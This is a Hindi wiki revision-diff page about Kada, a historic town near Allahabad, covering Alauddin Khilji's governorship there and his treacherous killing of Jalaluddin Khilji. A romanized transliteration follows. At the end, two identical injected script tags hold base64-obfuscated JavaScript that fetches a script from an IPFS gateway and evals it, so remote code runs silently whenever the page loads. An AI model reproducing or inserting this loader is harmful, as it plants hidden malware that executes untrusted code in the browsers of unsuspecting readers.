Difference between revisions of "कड़ा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 1: Line 1:
*[[उत्तर प्रदेश]] में [[इलाहाबाद]] से 40 मील की दूरी पर कड़ा अवस्थित है।
+
'''कड़ा''' ज़िला इलाहाबाद, उत्तर प्रदेश का एक ऐतिहासिक नगर है। यहाँ पर ख़िलजी वंश का सुल्तान जलालुद्दीन ख़िलजी ने 1296 ई. में अपने भतीजे एवं दामाद अलाउद्दीन ख़िलजी के हाथों मारा गया था।
*[[जलालुद्दीन ख़िलजी]] के शासनकाल (1290-96 ई.) में [[अलाउद्दीन ख़िलजी]] कड़ा का सूबेदार था।
 
*कड़ा के निकट ही [[गंगा]] के किनारे उसने चाचा जलालुद्दीन को धोखे से मार दिया।
 
*कड़ा एक अत्यधिक इक्ता (सूबा) था अतः यह समझा जाने लगा था कि जिसके पास कड़ा है, वहीं भावी सुल्तान है।
 
*कड़ा चावल [[गेहूँ]] एवं शक्कर आदि के उत्पादन के लिए प्रसिद्ध था।  
 
  
{{प्रचार}}
+
 
{{लेख प्रगति
+
*कड़ा उत्तर प्रदेश में इलाहाबाद से 40 मील की दूरी पर अवस्थित है।
|आधार=
+
*जलालुद्दीन ख़िलजी के शासनकाल (1290-96 ई.) में अलाउद्दीन ख़िलजी कड़ा का सूबेदार नियुक्त किया गया था।
|प्रारम्भिक=प्रारम्भिक1
+
*कड़ा के निकट ही [[गंगा]] के किनारे अलाउद्दीन ने अपने चाचा जलालुद्दीन को धोखे से मार दिया था।
|माध्यमिक=
+
*एक अत्यधिक 'इक्ता' (सूबे) के रूप में कड़ा बहुत प्रसिद्ध था।
|पूर्णता=
+
 
|शोध=
+
*एक समय यह माना जाने लगा था कि जिसके पास कड़ा है, वहीं भावी सुल्तान है।
}}
+
*कड़ा [[चावल]], [[गेहूँ]] एवं शक्कर आदि के उत्पादन के लिए भी प्रसिद्ध था।
{{संदर्भ ग्रंथ}}
+
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 13:40, 22 May 2012

k da zila ilahabad, uttar pradesh ka ek aitihasik nagar hai. yahaan par khilaji vansh ka sultan jalaluddin khilaji ne 1296 ee. mean apane bhatije evan damad alauddin khilaji ke hathoan mara gaya tha.


  • k da uttar pradesh mean ilahabad se 40 mil ki doori par avasthit hai.
  • jalaluddin khilaji ke shasanakal (1290-96 ee.) mean alauddin khilaji k da ka soobedar niyukt kiya gaya tha.
  • k da ke nikat hi ganga ke kinare alauddin ne apane chacha jalaluddin ko dhokhe se mar diya tha.
  • ek atyadhik 'ikta' (soobe) ke roop mean k da bahut prasiddh tha.
  • ek samay yah mana jane laga tha ki jisake pas k da hai, vahian bhavi sultan hai.
  • k da chaval, gehooan evan shakkar adi ke utpadan ke lie bhi prasiddh tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>